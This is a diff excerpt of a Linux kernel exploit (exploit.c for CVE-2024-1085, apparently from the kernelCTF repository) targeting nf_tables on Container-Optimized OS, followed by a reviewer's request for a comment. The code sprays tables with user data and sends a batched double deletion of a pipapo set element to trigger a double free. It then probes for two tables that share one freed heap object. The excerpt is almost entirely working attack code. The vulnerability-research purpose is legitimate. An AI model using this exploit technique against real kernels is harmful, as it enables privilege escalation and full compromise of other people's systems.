pocs/linux/kernelctf/CVE-2024-1085_cos/exploit/cos-105-17412.226.43/exploit.c

```diff
@@ -0,0 +1,339 @@
+   char *tmp = malloc(0x100);
+   memset(tmp,0,0x100);
+   int i;
+   for(i=0;i<len;i++){
+        snprintf(tmp, 0x100, "table_for_leak_%ld", table_num);
+        new_table_with_udata(socket, tmp, udata, size);
+        ++table_num;
+   }
+   free(tmp);
+}
+
+void exploit(struct nl_sock *socket){
+    int i;
+    char *table = "table for exp";
+    char *pipapo_set = "set pipapo for exp";
+    char *bitmap_set = "set bitmap for exp";
+    char *target_obj = "obj for exp";
+
+    new_table(socket, table);
+    new_set_pipapo(socket,table, pipapo_set, NFT_OBJECT_CT_EXPECT);
+    new_set_bitmap(socket, table, bitmap_set);
+    
+    char *key = malloc(0x40);
+    char *key_end = malloc(0x40);
+    char *pad = malloc(0x100);
+    memset(pad,0x41,0x100);
+    uint64_t hash_key;
+    
+    char *test_table = "test table";
+    memset(key,0,0x40);
+    memset(key_end,0,0x40);
+    spray_tables(socket,0x100, pad, 0xd0);
+    new_obj_ct_expect(socket, table, target_obj, NULL, 0);
+    new_setelem(socket, table, pipapo_set, pad, 0xc0, target_obj, NULL, 0, NULL, 0, 1);
+    new_table_with_udata(socket, test_table, pad, 0xd0);
+    spray_tables(socket,0x100, pad, 0xd0);
+    struct nlmsghdr **msg_list = malloc(sizeof(struct nlmsghdr *)*5);
+    memset(msg_list, 0, sizeof(struct nlmsghdr *)*5);
+    msg_list[0] = del_setelem_msg(table, pipapo_set, NULL, 0, NULL, 0, 1);
+    msg_list[1] = del_table_msg(test_table);
+    msg_list[2] = del_setelem_msg(table, pipapo_set, NULL, 0, NULL, 0, 1);
+    send_msg_list(socket, msg_list, 3);
+    //Now we try to get the heap back and check if we success
+    struct nl_sock * socket2 = nl_socket_alloc();
+    if(nfnl_connect(socket2)<0){
+        printf("nfnl_connect fail!\n");
+        return 0;
+    }
+    nl_socket_modify_cb(socket2,NL_CB_MSG_IN, NL_CB_CUSTOM, nl_callback_get_table, NULL);
+    int try_num = 0;
+    char *table_name = malloc(0x100);
+    int a=0,b=0;
+    while(1){
+	printf("trying %d\n",try_num);
+	snprintf(table_name, 0x100, "table for test %d", try_num);
+	*(int *)pad = try_num;
+	new_table_with_udata(socket, table_name, pad, 0xd0);
+	int i;
+	for(i=0;i<try_num;i++){
+		snprintf(table_name, 0x100, "table for test %d", i);
+		get_table(socket2, table_name);
+		nl_recvmsgs_default(socket2);
+        	nl_recvmsgs_default(socket2);
+		printf("Get udata : %d\n", *(int *)table_udata);
+		if(*(int *)table_udata != i){
+		//It means we get two same object from the free list of kernel heap.
+			a = *(int *)table_udata;
+			b = i;
+			break;
+		}
+	}
+	if(b!=0)
+		break;
+	try_num++;
+	//sleep(0.2);
+    	
+    }
+    //Now, we free many object to avoid crash
+    char *tmp = malloc(0x100);
+    memset(tmp,0,0x100);
+    
+    for(i=0x80;i<0x180;i++){
+	snprintf(tmp, 0x100, "table_for_leak_%ld", i);
+        del_table(socket, tmp);
+    }
+    printf("We get it! A: %d B: %d \n", a, b);
+    sleep(2);
+    snprintf(tmp, 0x100, "table for test %d", a);
```

Comment:
Comment here that this is "step 4" based on the writeup. Also include what does it do:
> Delete `nft_table C`.